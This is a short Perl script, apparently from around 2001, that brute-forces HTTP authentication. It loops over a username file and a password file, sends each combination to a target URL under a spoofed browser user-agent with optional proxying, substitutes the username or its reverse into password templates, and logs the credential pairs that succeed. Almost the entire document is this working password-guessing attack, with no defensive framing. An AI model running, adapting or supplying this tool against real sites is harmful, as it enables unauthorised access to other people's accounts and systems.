#!/usr/bin/perl # # 2001mei@websec.org # minihack because of digest-auth!! # ################################### use LWP; use Getopt::Std; use HTTP::Request; use HTTP::Response; use vars qw($opt_a $opt_u $opt_p $opt_l $opt_v); getopts("a:u:p:l:v:"); # very object oriented :-) # "overwritten" get_basic_credentials method # useful for our own authentication :-) # of course one could create a "real" package # but .. whatfor :-) # { package RequestAgent; @ISA = qw(LWP::UserAgent); $nutzer = ""; $passwort = ""; $pwc = 0; @pwlist = ""; sub new { my $self = LWP::UserAgent::new(@_); $self->agent("Mozilla 6.0 Windows NT/5.0 V43"); $self; } sub pwset { ($self,$user,$pass) = @_; } sub get_basic_credentials { my($self, $realm, $uri) = @_; my $netloc = $uri->host_port; return ($user, $pass); } } # # end minipackage ##################################### ## vardecs ## my $adress = $opt_a; my $userfile = $opt_u; my $passfile = $opt_p; my $logfile = $opt_l; my $proxy = $opt_v; my @passes; ## check that ## if (!$adress || !$userfile || !$passfile) { print "\nusage: $0 -a [url]\n\t-u [userFile]\n\t-p [passfile]\n\t-l [logfile]\n\t-p [proxy]\n\n"; exit 11; } ## the main :-)) routine ## pretty short ah ## ## iv ## ($adress = "http://".$adress) if ($adress !~ /http:\/\// && $adress !~ /https:\/\//); ## resultfile if ($logfile ne '') { open (RF, "> $logfile") || die "\ncant open $logfile !?!\n"; print RF "$adress:\n"; } open(UF, "< $userfile") || die "\ncant open $userfile\n"; while (<UF>) { my $uid = $_; ## open(PF, "< $passfile") || die "\ncant open $passfile\n"; ## while (<PF>) { my $pwd = $_; my $user_agent = RequestAgent->new(); $user_agent->agent("Mozilla/4.0(compatible;MSIE 6.0;Windows NT 5.0)"); if ($proxy ne '') { $user_agent->proxy('http', $proxy) if($adress =~ /^http:\/\/.*$/); $user_agent->proxy('https', $proxy) if($adress =~ /^https:\/\/.*$/); } $uid =~ s/[\n\r]//g; $pwd =~ s/[\n\r]//g; $pwd = &special($uid,$pwd); $user_agent->pwset($uid,$pwd); my $request = new HTTP::Request('GET', $adress); my $response = $user_agent->request($request); if ($response->is_success) { print "$uid:$pwd *** WORKING *** (",$response->code(),")\n"; print RF "$uid:$pwd *** WORKING *** (",$response->code(),")\n" if ($logfile ne ''); } else { print "$uid:$pwd (",$response->code(),")\n"; print RF "$uid:$pwd (",$response->code(),")\n" if ($logfile ne ''); } } close(PF); } close (UF); close (RF); ### sub special (pwd,uid) ### returns pwd sub special { my $u = shift; my $p = shift; ## check for %%UID%% in password ## $p =~ s/%%UID%%/$u/ if($p =~ /%%UID%%/); ## check for %%UIDREV%% in password ## if ($p =~ /%%UIDREV%%/) { my $tmp = ""; my $c = 0; for ($c=length($u);$c>=0;$c--) { $tmp .= substr($u,$c,1); } $p =~ s/%%UIDREV%%/$tmp/; } ## done ## return $p; }